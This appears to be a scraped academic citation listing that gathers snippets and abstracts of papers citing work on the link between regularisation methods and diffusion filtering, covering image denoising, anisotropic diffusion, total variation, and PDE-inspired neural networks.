numerical algorithms, we now concentrate on two-dimensional diffusion models that incorporate different strategies to achieve rotation invariance. ... ... with an increasing regulariser function Ψ which can be connected to the diffusivity g by g = Ψ ′ [65]. The argument of the regulariser is the trace of the so-called structure tensor [26], here without Gaussian regularisation, which reads ... Preprint Full-text available Partial differential equation (PDE) models and their associated variational energy formulations are often rotationally invariant by design. This ensures that a rotation of the input results in a corresponding rotation of the output, which is desirable in applications such as image analysis. Convolutional neural networks (CNNs) do not share this property, and existing remedies are often complex. The goal of our paper is to investigate how diffusion and variational models achieve rotation invariance and transfer these ideas to neural networks. As a core novelty we propose activation functions which couple network channels by combining information from several oriented filters. This guarantees rotation invariance within the basic building blocks of the networks while still allowing for directional filtering. The resulting neural architectures are inherently rotationally invariant. With only a few small filters, they can achieve the same invariance as existing techniques which require a fine-grained sampling of orientations. Our findings help to translate diffusion and variational models into mathematically well-founded network architectures, and provide novel concepts for model-based CNN design. ... On the other hand, anisotropic diffusion is inherent to Perona-Malik (PM) filtering [36]. It is well known that the diffusion process governed by the PM equation leads to a decrease in the total variation during its evolution [43]. We, thus, choose the energy functional of the Perona-Malik equation for anisotropic diffusion [36]. ... ... We refer to [11,43] for a general introduction to anisotropic diffusion and a detailed discussion on the PM functional. Further, in [40], the PM model was used in the reconstruction of log-conductivities in AET and it was observed that the reconstructions obtained demonstrated superior contrast and resolution. ... Article Full-text available A new nonlinear optimization approach is proposed for the sparse reconstruction of log-conductivities in current density impedance imaging. This framework comprises of minimizing an objective functional involving a least squares fit of the interior electric field data corresponding to two boundary voltage measurements, where the conductivity and the electric potential are related through an elliptic PDE arising in electrical impedance tomography. Further, the objective functional consists of a $$L^1$$ regularization term that promotes sparsity patterns in the conductivity and a Perona–Malik anisotropic diffusion term that enhances the edges to facilitate high contrast and resolution. This framework is motivated by a similar recent approach to solve an inverse problem in acousto-electric tomography. Several numerical experiments and comparison with an existing method demonstrate the effectiveness of the proposed method for superior image reconstructions of a wide variety of log-conductivity patterns. ... and results in the diffusion equation [25,42,51]. In the case of isotropic filtering, the diffusion equation has a closed form solution. ... ... This problem has previously been studied by, e.g., Scherzer and Weickert [51]. Here we tackle the energy functional directly and show that the failing component is the application of Green's identity. ... Article Full-text available In this work, we introduce a novel tensor-based functional for targeted image enhancement and denoising. Via explicit regularization, our formulation incorporates application-dependent and contextual information using first principles. Few works in literature treat variational models that describe both application-dependent information and contextual knowledge of the denoising problem. We prove the existence of a minimizer and present results on tensor symmetry constraints, convexity, and geometric interpretation of the proposed functional. We show that our framework excels in applications where nonlinear functions are present such as in gamma correction and targeted value range filtering. We also study general denoising performance where we show comparable results to dedicated PDE-based state-of-the-art methods. ... More recent approaches are attempted to fuse the two formulations [Bruhn 2005]. The penalty term plays a key role as a diffusion operator can act isotropically or anisotropically [Black 1998, Scherzer 2000, Aubert 2006]. A variety of diffusion mechanisms has been proposed so that, e.g., optical flow discontinuities could be preserved depending on velocity field variations or image structures. ... Thesis In this thesis, we studied the problem of motion estimation in mammals and propose that scaling up models rooted in biology for real world applications can give us fresh insights into the biological vision. Using a classic model that describes the activity of directionally-selective neurons in V1 and MT areas of macaque brain, we proposed a feedforward V1-MT architecture for motion estimation and benchmarked it on computer vision datasets (first publicly available evaluation for this kind of models), revealing interesting shortcomings such as lack of selectivity at motion boundaries and lack of spatial association of the flow field. To address these, we proposed two extensions, a form modulated pooling strategy to minimize errors at texture boundaries and a regression based decoding scheme. These extensions improved estimation accuracy but also reemphasized the debate about the role of different cell types (characterized by their tuning curves) in encoding motion, for example relative role of pattern cells versus component cells. To understand this, we used a phenomenological neural fields model representative of a population of directionally tuned MT cells to check whether different tuning behaviors could be reproduced by a recurrently interacting population or if we need different types of cells explicitly. Our results indicated that a variety of tuning behavior can be reproduced by a minimal network, explaining dynamical changes in the tuning with change of stimuli leading us to question the high inhibition regimes typically considered by models in the literature. ... In order to overcome the problems of ADF and TV and combine their benefits, it is helpful to notice the close relation between diffusion filtering and regularization, which was initially studied in [57] for isotropic diffusion. The relation between anisotropic diffusion and the TV regularization was studied in [25], via the TRTV model as follows, ... Article Full-text available Third harmonic generation (THG) microscopy shows great potential for instant pathology of brain tissue during surgery. However, the rich morphologies contained and the noise associated make image restoration, necessary for quantification of the THG images, challenging. Anisotropic diffusion filtering (ADF) has been recently applied to restore THG images of normal brain, but ADF is hard‐to‐code, time‐consuming and only reconstructs salient edges. This work overcomes these drawbacks by expressing ADF as a tensor regularized total variation (TRTV) model, which uses the Huber penalty and the L1 norm for tensor regularization and fidelity measurement, respectively. The diffusion tensor is constructed from the structure tensor of ADF yet the tensor decomposition is performed only in the non‐flat areas. The resulting model is solved by an efficient and easy‐to‐code primal‐dual algorithm. Tests on THG brain tumor images show that the proposed model has comparable denoising performance as ADF while it much better restores weak edges and it is up to 60% more time efficient. This article is protected by copyright. All rights reserved. ... For the Rudin, Osher, Fatemi (ROF) regularization [52], also known as total variation regularization, the data term is the squared L 2 -norm and R(w) = |w| T V is the total variation semi-norm. Other widely used regularization functionals are sparsity promoting [22,39], Besov space norms [44,40] and anisotropic regularization norms [45,54]. Aside from various regularization terms there also have been proposed different fidelity terms other than quadratic norm fidelities, like the p-th powers of p and L p -norms of the differences of F (w) and v , [53,55], Maximum Entropy [25,26] and Kullback-Leibler divergence [50] (see [48] for some reference work). ... Preprint We present an approach for variational regularization of inverse and imaging problems for recovering functions with values in a set of vectors. We introduce regularization functionals, which are derivative-free double integrals of such functions. These regularization functionals are motivated from double integrals, which approximate Sobolev semi-norms of intensity functions. These were introduced in Bourgain, Br\'ezis and Mironescu, "Another Look at Sobolev Spaces". In: Optimal Control and Partial Differential Equations-Innovations and Applications, IOS press, Amsterdam, 2001. For the proposed regularization functionals we prove existence of minimizers as well as a stability and convergence result for functions with values in a set of vectors. ... For example, regularisation methods and related concepts can be interpreted as scale-spaces by considering their Euler-Lagrange equations, both in the linear and the nonlinear setting [see e.g. Poggio et al., 1988, Scherzer and Weickert, 2000, Burgeth et al., 2005b, Demetz et al., 2012. Since Gaussian scale-space can be described by a linear diffusion equation, it is natural to generalise it also to nonlinear diffusion scale-spaces [Perona andMalik, 1990, Weickert, 1998]. ... ... For simplicity, we call this process diffusion in both cases, as usual in physics. For details of the very close relation between regularization and diffusion see(Scherzer and Weickert, 1998). ... Article Full-text available In this work we propose a novel non-linear diffusion filtering approach for images based on their channel representation. To derive the diffusion update scheme we formulate a novel energy functional using a soft-histogram representation of image pixel neighborhoods obtained from the channel encoding. The resulting Euler-Lagrange equation yields a non-linear robust diffusion scheme with additional weighting terms stemming from the channel representation which steer the diffusion process. We apply this novel energy formulation to image reconstruction problems, showing good performance in the presence of mixtures of Gaussian and impulse-like noise, e.g. missing data. In denoising experiments of common scalar-valued images our approach performs competitive compared to other diffusion schemes as well as state-of-the-art denoising methods for the considered noise types. Copyright © 2014 SCITEPRESS - Science and Technology Publications. All rights reserved. ... Interestingly, diffusion filtering can be related to many other types of denoising methods. For instance, Scherzer and Weickert [23] have shown connections between variational methods such as Tikhonov [26] or TV regularisation [22] and fully implicit time discretisations of diffusion filters. Furthermore, a large variety of diffusion filters for denoising can be interpreted as Bayesian denoising models; see e.g. ... Conference Paper Full-text available The filling-in effect of diffusion processes has been successfully used in many image analysis applications. Examples include image reconstructions in inpainting-based compression or dense optic flow computations. As an interesting side effect of diffusion-based inpainting, the interpolated data are smooth, even if the known image data are noisy: Inpainting averages information from noisy sources. Since this effect has not been investigated for denoising purposes so far, we propose a general framework for denoising by inpainting. It averages multiple inpainting results from different selections of known data. We evaluate two concrete implementations of this framework: The first one specifies known data on a shifted regular grid, while the second one employs probabilistic densification to optimise the known pixel locations w.r.t. the inpainting quality. For homogeneous diffusion inpainting, we demonstrate that our regular grid method approximates the quality of its corresponding diffusion filter. The densification algorithm with homogeneous diffusion inpainting, however, shows edge-preserving behaviour. It resembles space-variant diffusion and offers better reconstructions than homogeneous diffusion filters. ... Originally, the procedure to determine the minimum-norm solutions for ill-posed systems was given by Tikhonov (1963), for regularisation methods, see the references Charbonnier et al. (1994), Nordstrom (1990), Scherzer (1998), Scherzer and Weickert (2000) and Schnörr (1994). Our exemplar of a variational method for denoising or simplifying an image u 0 can be achieved in Welk et al. (2005) by minimising the energy functional ... Article Image denoising is still a crucial problem for image processing community as well as mathematicians alike. This paper propose a denoising technique based on wavelet coefficients via diffusion equation. The present work compares different denoising process by diffusion models. The data is initially subjected to synthetic noisy data with various levels of standard deviation ${\sigma}^2$. To quantify the results, we use peak signal to noise ratio (PSNR) as metric. ... Typical representatives of nonlinear scale-spaces are given by nonlinear diffusion scale-spaces [1], the morphological equivalent of Gaussian scale-space [16], and curvature-driven evolutions such as the affine morphological scale-space [17]. Moreover, also spatio-temporal scale-spaces have been considered [18,19], regularisation methods have been identified as scale-spaces [20], and spatially varying dominant scales have been proposed in [21]. Many of these processes exhibit a local behaviour and can be described in terms of partial differential equations (PDEs) or pseudodifferential equations. ... ... Previous works [48], [41] show that in the nonlinear diffusion framework, there exist natural relations between reaction diffusion and regularization based energy functional. First of all, we can interpret (4) as one gradient descent step at u t−1 of a certain energy functional given by ... Article Image restoration is a long-standing problem in low-level computer vision with many interesting applications. We describe a flexible learning framework based on the concept of nonlinear reaction diffusion models for various image restoration problems. By embodying recent improvements in nonlinear diffusion models, we propose a dynamic nonlinear reaction diffusion model with time-dependent parameters (\ie, linear filters and influence functions). In contrast to previous nonlinear diffusion models, all the parameters, including the filters and the influence functions, are simultaneously learned from training data through a loss based approach. We call this approach TNRD -- \textit{Trainable Nonlinear Reaction Diffusion}. The TNRD approach is applicable for a variety of image restoration tasks by incorporating appropriate reaction force. We demonstrate its capabilities with three representative applications, Gaussian image denoising, single image super resolution and JPEG deblocking. Experiments show that our trained nonlinear diffusion models largely benefit from the training of the parameters and finally lead to the best reported performance on common test datasets for the tested applications. Our trained models preserve the structural simplicity of diffusion models and take only a small number of diffusion steps, thus are highly efficient. Moreover, they are also well-suited for parallel computation on GPUs, which makes the inference procedure extremely fast. ... where the first term, called fidelity term, encourages the similarity betweenf and its denoised version f , and the second term P( f , ∇ f ), called penalty term, controls the regularity of the solution. Indeed, it is known that there is a strong relations between regularisation methods and diffusion filters [74]. ... ... This is a fundamental idea in image processing related to the concept of scale spaces, see e.g. [4,11] for useful discussions. However, especially in the context of nonlinear filtering, it is not at all obvious when to stop the diffusion process. ... Conference Paper Anisotropic diffusion is a time-dependent process in image processing useful for denoising and related tasks. Applied at an input image, the latter is gradually simplified in such a way that edges tend to be preserved. Meaningful image structures can then be detected depending on the diffusion time and the spatial scale of a structure. One of the most important points in anisotropic diffusion filtering is introducing a stopping criterion for the time evolution as this defines the quality of output images. In this paper, we follow the approach of a recent method by Ilyevsky and Turkel for determining a useful stopping time. While following the same basic idea, we simplify the underlying algorithm and improve at the same time the quality of filtering results significantly. The superiority of our scheme is validated by several numerical experiments with standard test images in the field. ... For simplicity, we call this process diffusion in both cases, as usual in physics. For details of the very close relation between regularization and diffusion see(Scherzer and Weickert, 1998). ... Conference Paper Describing persons and their actions is a challenging problem due to variations in pose, scale and viewpoint in real-world images. Recently, semantic pyramids approach [1] for pose normalization has shown to provide excellent results for gender and action recognition. The performance of semantic pyramids approach relies on robust image description and is therefore limited due to the use of shallow local features. In the context of object recognition [2] and object detection [3], convolutional neural networks (CNNs) or deep features have shown to improve the performance over the conventional shallow features. We propose deep semantic pyramids for human attributes and action recognition. The method works by constructing spatial pyramids based on CNNs of different part locations. These pyramids are then combined to obtain a single semantic representation. We validate our approach on the Berkeley and 27 Human Attributes datasets for attributes classification. For action recognition, we perform experiments on two challenging datasets: Willow and PASCAL VOC 2010. The proposed deep semantic pyramids provide a significant gain of $$17.2\,\%$$, $$13.9\,\%$$, $$24.3\,\%$$ and $$22.6\,\%$$ compared to the standard shallow semantic pyramids on Berkeley, 27 Human Attributes, Willow and PASCAL VOC 2010 datasets respectively. Our results also show that deep semantic pyramids outperform conventional CNNs based on the full bounding box of the person. Finally, we compare our approach with state-of-the-art methods and show a gain in performance compared to best methods in literature. ... Then, for a smooth initial function u (0) and α → 0, (u α − u (0) )/α converges to an element of the subgradient ∂R(u (0) ) of R. Performing an iterative minimization of .20)) are comparable and look rather similar [149]. We expect a similar behavior for the non-convex functional ... ... PM, : [37] PM; 2000, Chen [38] ; Weickert ... ... TV denoising in particular has several very interesting equivalences. It is well known that TV denoising and other more general first-order denoising methods are equivalent to smoothing with a certain nonlinear diffusion models [26], a typical result of writing the equivalent Euler-Lagrange equations. Perhaps discussed less frequently and most related to the observations in our current work, TV denoising is equivalent to soft threshold denoising with the highest-frequency basis elements of the Haar wavelets [27,28], in particular with the so-called cycle spinning [29]. ... Article Full-text available In the realm of signal and image denoising and reconstruction, ℓ 1 regularization techniques have generated a great deal of attention with a multitude of variants. In this work, we demonstrate that the ℓ 1 formulation can sometimes result in undesirable artifacts that are inconsistent with desired sparsity promoting ℓ 0 properties that the ℓ 1 formulation is intended to approximate. With this as our motivation, we develop a multiscale higher-order total variation (MHOTV) approach, which we show is related to the use of multiscale Daubechies wavelets. The relationship of higher-order regularization methods with wavelets, which we believe has generally gone unrecognized, is shown to hold in several numerical results, although notable improvements are seen with our approach over both wavelets and classical HOTV. These results are presented for 1D signals and 2D images, and we include several examples that highlight the potential of our approach for improving two- and three-dimensional electron microscopy imaging. In the development approach, we construct the tools necessary for MHOTV computations to be performed efficiently, via operator decomposition and alternatively converting the problem into Fourier space. ... Other widely used regularization functionals are sparsity promoting [22,41], Besov space norms [42,46] and anisotropic regularization norms [47,56]. Aside from various regularization terms, there also have been proposed different fidelity terms other than quadratic norm fidelities, like the pth powers of p and L p -norms of the differences of F(w) and v , [55,57], maximum entropy [26,28] and Kullback-Leibler divergence [52] (see [50] for some reference work). ... Article Full-text available We present an approach for variational regularization of inverse and imaging problems for recovering functions with values in a set of vectors. We introduce regularization functionals, which are derivative-free double integrals of such functions. These regularization functionals are motivated from double integrals, which approximate Sobolev semi-norms of intensity functions. These were introduced in Bourgain et al. (Another look at Sobolev spaces. In: Menaldi, Rofman, Sulem (eds) Optimal control and partial differential equations-innovations and applications: in honor of professor Alain Bensoussan’s 60th anniversary, IOS Press, Amsterdam, pp 439–455, 2001). For the proposed regularization functionals, we prove existence of minimizers as well as a stability and convergence result for functions with values in a set of vectors. ... where the penaliser can be linked to the diffusivity with g = [97]. The penaliser must be increasing, but not necessarily convex. ... Article Full-text available We investigate numerous structural connections between numerical algorithms for partial differential equations (PDEs) and neural architectures. Our goal is to transfer the rich set of mathematical foundations from the world of PDEs to neural networks. Besides structural insights, we provide concrete examples and experimental evaluations of the resulting architectures. Using the example of generalised nonlinear diffusion in 1D, we consider explicit schemes, acceleration strategies thereof, implicit schemes, and multigrid approaches. We connect these concepts to residual networks, recurrent neural networks, and U-net architectures. Our findings inspire a symmetric residual network design with provable stability guarantees and justify the effectiveness of skip connections in neural networks from a numerical perspective. Moreover, we present U-net architectures that implement multigrid techniques for learning efficient solutions of partial differential equation models, and motivate uncommon design choices such as trainable nonmonotone activation functions. Experimental evaluations show that the proposed architectures save half of the trainable parameters and can thus outperform standard ones with the same model complexity. Our considerations serve as a basis for explaining the success of popular neural architectures and provide a blueprint for developing new mathematically well-founded neural building blocks. ... Since its introduction by Perona and Malik, an extensive amount of literature has existed presenting a number of PDE-based anisotropic models which offer diverse modifications in order to attain a steady state solution and to address the issue of staircase effects [23][24][25][26][27][28][29][30] . The staircase effect presents a visually unpleasant artefactual display in images and often perplex as false edge. ... Article At the crossing of the statistical and functional analysis, there exists a relentless quest for an efficient image denoising algorithm. In terms of greyscale imaging, a plethora of denoising algorithms have been documented in the literature, in spite of which the level of functionality of these algorithms still holds margin to acquire desired level of applicability. Quite often noise affecting the pixels in image is Gaussian in nature and uniformly deters information pixels in image. Based on some specific set of assumptions all methods work optimally, however they tend to create artefacts and remove fine structural details under general conditions. This article focuses on classifying and comparing some of the significant works in the field of denoising. ... Integrodifferential models for nonlinear diffusion predominantly involve models with Gaussian-smoothed derivatives. Most of these models [14,7,15,16] have been proposed as regularisations of the Perona-Malik filter [1]. For enhancing coherent structures, one also considers a smoothed structure tensor [17] that captures directional information to steer the diffusion process accordingly [2]. ... Preprint Full-text available We introduce an integrodifferential extension of the edge-enhancing anisotropic diffusion model for image denoising. By accumulating weighted structural information on multiple scales, our model is the first to create anisotropy through multiscale integration. It follows the philosophy of combining the advantages of model-based and data-driven approaches within compact, insightful, and mathematically well-founded models with improved performance. We explore trained results of scale-adaptive weighting and contrast parameters to obtain an explicit modelling by smooth functions. This leads to a transparent model with only three parameters, without significantly decreasing its denoising performance. Experiments demonstrate that it outperforms its diffusion-based predecessors. We show that both multiscale information and anisotropy are crucial for its success. ... Assuming that the approximate solutions u n i;j , for 1 i; j M À 1 have been computed, we can approximate the boundary condition by u n 0;j ¼ u n 1;j ; u n M;j ¼ u n MÀ1;j ; u n i;0 ¼ u n i;1 ; u n i;M ¼ u n i;MÀ1 ; and u n 0;0 ¼ u n 1;1 ; u n 0;M ¼ u n 1;MÀ1 ; u n M;0 ¼ u n MÀ1;1 ; u n M;M ¼ u n MÀ1;MÀ1 . As known, the linear diffusion (ID) is well-posed (Yahya et al. 2014) [which means that ID model is stable (Weickert 1998)] and TV model is stable (Scherzer and Weickert 2000). So, the new model which is the combination of these two models is stable too. ... Article One of the fundamental problems in the field of image processing is denoising. The underlying goal of image denoising is to effectively suppress noise while keeping intact the significant features of the image, such as texture and edge information. The gradient of image is a famous feature descriptor in denoising models to distinguish edges and ramps. If the received signal of an image is very noisy, the gradient cannot effectively distinguish between the image edges and the image ramps. In this paper, based on the difference curvature and the gradient of the image, we introduce a new feature descriptor. For demonstrating the effectiveness of the new feature descriptor, we use it in constructing a new diffusion-based denoising model. Experimental results show the effectiveness of the method. ... where the penaliser Ψ can be linked to the diffusivity with g = Ψ [93]. The penaliser must be increasing, but not necessarily convex. ... Preprint Full-text available We investigate numerous structural connections between numerical algorithms for partial differential equations (PDEs) and neural architectures. Our goal is to transfer the rich set of mathematical foundations from the world of PDEs to neural networks. Besides structural insights we provide concrete examples and experimental evaluations of the resulting architectures. Using the example of generalised nonlinear diffusion in 1D, we consider explicit schemes, acceleration strategies thereof, implicit schemes, and multigrid approaches. We connect these concepts to residual networks, recurrent neural networks, and U-net architectures. Our findings inspire a symmetric residual network design with provable stability guarantees and justify the effectiveness of skip connections in neural networks from a numerical perspective. Moreover, we present U-net architectures that implement multigrid techniques for learning efficient solutions of partial differential equation models, and motivate uncommon design choices such as trainable nonmonotone activation functions. Experimental evaluations show that the proposed architectures save half of the trainable parameters and can thus outperform standard ones with the same model complexity. Our considerations serve as a basis for explaining the success of popular neural architectures and provide a blueprint for developing new mathematically well-founded neural building blocks. ... Integrodifferential models for nonlinear diffusion predominantly involve models with Gaussian-smoothed derivatives. Most of these models [14,7,15,16] have been proposed as regularisations of the Perona-Malik filter [1]. For enhancing coherent structures, one also considers a smoothed structure tensor [17] that captures directional information to steer the diffusion process accordingly [2]. ... ... Also, there have been many methods that use diffusion which can remove speckle noise efficiently. Filtering with use of single step of time discretization in diffusion is regarded as regularization [26]. There has been work done on the combination of both wavelets and diffusion methods. ... Article Full-text available Ultrasound (US) images are useful in medical diagnosis. US is preferred over other medical diagnosis technique because it is non-invasive in nature and has low cost. The presence of speckle noise in US images degrades its usefulness. A method that reduces the speckle noise in US images can help in correct diagnosis. This method also should preserve the important structural information in US images while removing the speckle noise. In this paper, a method for removing speckle noise using a combination of wavelet, total variation (TV) and morphological operations has been proposed. The proposed method achieves denoising by combining the advantages of the wavelet, TV and morphological operations along with the utilization of adaptive regularization parameter which controls the amount of smoothing during denoising. The work in this paper has the capability of reducing speckle noise while preserving the structural information in the denoised image. The proposed method demonstrates strong denoising for synthetic and real ultrasound images, which is also supported by the results of various quantitative measures and visual inspection. ... An extension by a suitable regularization can help to preserve edges in the reconstruction without the loss of small details, or the introduction of additional noise. One possibility is to use diffusion filtering [65], for example, variants of the Perona-Malik diffusion [66] in this role. Diffusion filtering was also successfully applied as a post-processing step for CT [67]. ... Article Full-text available The reconstruction of computed tomography (CT) images is an active area of research. Following the rise of deep learning methods, many data-driven models have been proposed in recent years. In this work, we present the results of a data challenge that we organized, bringing together algorithm experts from different institutes to jointly work on quantitative evaluation of several data-driven methods on two large, public datasets during a ten day sprint. We focus on two applications of CT, namely, low-dose CT and sparse-angle CT. This enables us to fairly compare different methods using standardized settings. As a general result, we observe that the deep learning-based methods are able to improve the reconstruction quality metrics in both CT applications while the top performing methods show only minor differences in terms of peak signal-to-noise ratio (PSNR) and structural similarity (SSIM). We further discuss a number of other important criteria that should be taken into account when selecting a method, such as the availability of training data, the knowledge of the physical measurement model and the reconstruction speed. ... Sparsification scale-spaces have demonstrated that there are viable scalespace concepts beyond the classical ideas that rely on partial differential equations (PDEs) [2,8,15,21] or evolutions according to pseudodifferential operators [5,17]. In the present paper, we show that quantisation methods can also imply scale-spaces and that this leads to practical consequences for inpainting-based compression. ... Preprint Full-text available Recently, sparsification scale-spaces have been obtained as a sequence of inpainted images by gradually removing known image data. Thus, these scale-spaces rely on spatial sparsity. In the present paper, we show that sparsification of the co-domain, the set of admissible grey values, also constitutes scale-spaces with induced hierarchical quantisation techniques. These quantisation scale-spaces are closely tied to information theoretical measures for coding cost, and therefore particularly interesting for inpainting-based compression. Based on this observation, we propose a sparsification algorithm for the grey-value domain that outperforms uniform quantisation as well as classical clustering approaches. Conference Paper Tensor-driven anisotropic diffusion and regularisation have been successfully applied to a wide range of image processing and computer vision tasks such as denoising, inpainting, and optical flow. Empirically it has been shown that anisotropic models with a diffusion tensor perform better than their isotropic counterparts with a scalar-valued diffusivity function. However, the reason for this superior performance is not well understood so far. Moreover, the specific modelling of the anisotropy has been carried out in a purely heuristic way. The goal of our paper is to address these problems. To this end, we use the statistics of natural images to derive a unifying framework for eight isotropic and anisotropic diffusion filters that have a corresponding variational formulation. In contrast to previous statistical models, we systematically investigate structure-adaptive statistics by analysing the eigenvalues of the structure tensor. With our findings, we justify existing successful models and assess the relationship between accurate statistical modelling and performance in the context of image denoising. Conference Paper We investigate the use of fractional powers of the Laplacian for signal and image simplification. We focus both on their corresponding variational techniques and parabolic pseudodifferential equations. We perform a detailed study of the regularisation properties of energy functionals, where the smoothness term consists of various linear combinations of fractional derivatives. The associated parabolic pseudodifferential equations with constant coefficients are providing the link to linear scale-space theory. These encompass the well-known a-scale-spaces, even those with parameter values alpha > 1 known to violate common maximum-minimum principles. Nevertheless, we show that it is possible to construct positivity-preserving combinations of high and low-order filters. Numerical experiments in this direction indicate that non-integral orders play an essential role in this construction. The paper reveals the close relation between continuous and semi-discrete filters, and by that helps to facilitate efficient implementations. In additional numerical experiments we compare the variance decay rates for white noise and edge signals through the action of different filter classes. Conference Paper Line drawings are especially effective and natural in shape depiction. There are generally two ways to generate line drawings: object space methods and image space methods. Compared with object space methods, image space methods are much faster and independent of the 3D object, but easily affected by small noise in the rendered image. We suggest applying an edge-preserving L0 gradient smoothing step on the rendered image before line extraction. Experimental results show that our method can effectively alleviate unnecessary small scale lines, leading to results comparable to object space methods. Article Full-text available Studies in biological vision have always been a great source of inspiration for design of computer vision algorithms. In the past, several successful methods were designed with varying degrees of correspondence with biological vision studies, ranging from purely functional inspiration to methods that utilise models that were primarily developed for explaining biological observations. Even though it seems well recognised that computational models of biological vision can help in design of computer vision algorithms, it is a non-trivial exercise for a computer vision researcher to mine relevant information from biological vision literature as very few studies in biology are organised at a task level. In this paper we aim to bridge this gap by providing a computer vision task centric presentation of models primarily originating in biological vision studies. Not only do we revisit some of the main features of biological vision and discuss the foundations of existing computational studies modelling biological vision, but also we consider three classical computer vision tasks from a biological perspective: image sensing, segmentation and optical flow. Using this task-centric approach, we discuss well-known biological functional principles and compare them with approaches taken by computer vision. Based on this comparative analysis of computer and biological vision, we present some recent models in biological vision and highlight a few models that we think are promising for future investigations in computer vision. To this extent, this paper provides new insights and a starting point for investigators interested in the design of biology-based computer vision algorithms and pave a way for much needed interaction between the two communities leading to the development of synergistic models of artificial and biological vision. Conference Paper Full-text available The general solution of anisotropic diffusionmodel in image denoising has slow convergence rate. Toovercome the problem, a new Newton method is proposed. In the new model, first and second Gateaux derivatives are figured out firstly. Then two continuous operators are introduced to avoid the error which is arisen by directly discretizing the iteration equation. To solve the singularity problem of the image and eliminate the impact of parameter, image geometry feature is considered when computing the equation using lagged fixed pointalgorithm. The classical Rudin-Osher-Fatemi(ROF) model is taken as an example. In the numerical experiment, the denoising performance of the new Newton method is compared with gradient descent algorithm and the Newton method which is proposed by Vogel. The numerical results demonstrate that new algorithm has faster computing rate with similar denoising performance of traditional algorithms. Chapter Recently, sparsification scale-spaces have been obtained as a sequence of inpainted images by gradually removing known image data. Thus, these scale-spaces rely on spatial sparsity. In the present paper, we show that sparsification of the co-domain, the set of admissible grey values, also constitutes scale-spaces with induced hierarchical quantisation techniques. These quantisation scale-spaces are closely tied to information theoretical measures for coding cost, and therefore particularly interesting for inpainting-based compression. Based on this observation, we propose a sparsification algorithm for the grey-value domain that outperforms uniform quantisation as well as classical clustering approaches. Article Full-text available In this paper, a denoising PDE model based on a combination of the isotropic diffusion and total variation models is presented. The new weighted model is able to be adaptive in each region in accordance with the image's information. The model performs more diffusion in the flat regions of the image, and less diffusion in the edges of the image. The new model has more ability to restore the image in terms of peak signal to noise ratio and visual quality, compared with total variation, isotropic diffusion, and some well-known models. Experimental results show that the model is able to suppress the noise effectively while preserving texture features and edge information well. Conference Paper Most scale-space evolutions are described in terms of partial differential equations. In recent years, however, nonlocal processes have become an important research topic in image analysis. The goal of our paper is to establish well-posedness and scale-space properties for a class of nonlocal evolutions. They are given by linear integro-differential equations with measures. In analogy to Weickert’s diffusion theory (1998), we prove existence and uniqueness, preservation of the average grey value, a maximum–minimum principle, image simplification properties in terms of Lyapunov functionals, and we establish convergence to a constant steady state. We show that our nonlocal scale-space theory covers nonlocal variants of linear diffusion. Moreover, by choosing specific discrete measures, the classical semidiscrete diffusion framework is identified as a special case of our continuous theory. Last but not least, we introduce two modifications of bilateral filtering. In contrast to previous bilateral filters, our variants create nonlocal scale-spaces that preserve the average grey value and that can be highly robust under noise. While these filters are linear, they can achieve a similar performance as nonlinear and even anisotropic diffusion equations. Conference Paper Many image processing methods such as corner detection, optical flow and iterative enhancement make use of image tensors. Generally, these tensors are estimated using the structure tensor. In this work we show that the gradient energy tensor can be used as an alternative to the structure tensor in several cases. We apply the gradient energy tensor to common image problem applications such as corner detection, optical flow and image enhancement. Our experimental results suggest that the gradient energy tensor enables real-time tensor-based image enhancement using the graphical processing unit (GPU) and we obtain 40 % increase of frame rate without loss of image quality. Article Full-text available We discuss the resolving power of three geophysical imaging and inversion techniques, and their combination, for the reconstruction of material parameters in the Earth’s subsurface. The governing equations are those of Newton and Poisson for gravitational problems, the acoustic wave equation under Hookean elasticity for seismology, and the geodynamics equations of Stokes for incompressible steady-state flow in the mantle. The observables are the gravitational potential, the seismic displacement, and the surface velocity, all measured at the surface. The inversion parameters of interest are the mass density, the acoustic wave speed, and the viscosity. These systems of partial differential equations and their adjoints were implemented in a single Python code using the finite-element library FeNICS. To investigate the shape of the cost functions, we present a grid search in the parameter space for three end-member geological settings: a falling block, a subduction zone, and a mantle plume. The performance of a gradient-based inversion for each single observable separately, and in combination, is presented. We furthermore investigate the performance of a shape-optimizing inverse method, when the material is known, and an inversion that inverts for the material parameters of an anomaly with known shape. Article Automatically learning features, especially robust features, has attracted much attention in the machine learning community. In this paper, we propose a new method to learn non-linear robust features by taking advantage of the data manifold structure. We first follow the commonly used trick of the trade, that is learning robust features with artificially corrupted data, which are training samples with manually injected noise. Following the idea of the auto-encoder, we first assume features should contain much information to well reconstruct the input from its corrupted copies. However, merely reconstructing clean input from its noisy copies could make data manifold in the feature space noisy. To address this problem, we propose a new method, called Incremental Auto-Encoders, to iteratively denoise the extracted features. We assume the noisy manifold structure is caused by a diffusion process. Consequently, we reverse this specific diffusion process to further contract this noisy manifold, which results in an incremental optimization of model parameters . Furthermore, we show these learned non-linear features can be stacked into a hierarchy of features. Experimental results on real-world datasets demonstrate the proposed method can achieve better classification performances. Preprint Full-text available Convolutional neural networks (CNNs) often perform well, but their stability is poorly understood. To address this problem, we consider the simple prototypical problem of signal denoising, where classical approaches such as nonlinear diffusion, wavelet-based methods and regularisation offer provable stability guarantees. To transfer such guarantees to CNNs, we interpret numerical approximations of these classical methods as a specific residual network (ResNet) architecture. This leads to a dictionary which allows to translate diffusivities, shrinkage functions, and regularisers into activation functions, and enables a direct communication between the four research communities. On the CNN side, it does not only inspire new families of nonmonotone activation functions, but also introduces intrinsically stable architectures for an arbitrary number of layers. Article Full-text available In this paper, a denoising PDE model based on a combination of the isotropic diffusion and total variation models is presented. The new weighted model is able to be adaptive in each region in accordance with the image’s information. The model performs more diffusion in the flat regions of the image, and less diffusion in the edges of the image. The new model has more ability to restore the image in terms of peak signal to noise ratio and visual quality, compared with total variation, isotropic diffusion, and some well-known models. Experimental results show that the model is able to suppress the noise effectively while preserving texture features and edge information well. Chapter We introduce a novel scale-space concept that is inspired by inpainting-based lossy image compression and the recent denoising by inpainting method of Adam et al. (2017). In the discrete setting, the main idea behind these so-called sparsification scale-spaces is as follows: Starting with the original image, one subsequently removes a pixel until a single pixel is left. In each removal step the missing data are interpolated with an inpainting method based on a partial differential equation. We demonstrate that under fairly mild assumptions on the inpainting operator this general concept indeed satisfies crucial scale-space properties such as gradual image simplification, a discrete semigroup property or invariances. Moreover, our experiments show that it can be tailored towards specific needs by selecting the inpainting operator and the pixel sparsification strategy in an appropriate way. This may lead either to uncommitted scale-spaces or to highly committed, image-adapted ones. Article This paper investigates a novel variational optimization model for image denoising. Within this work, a bilevel 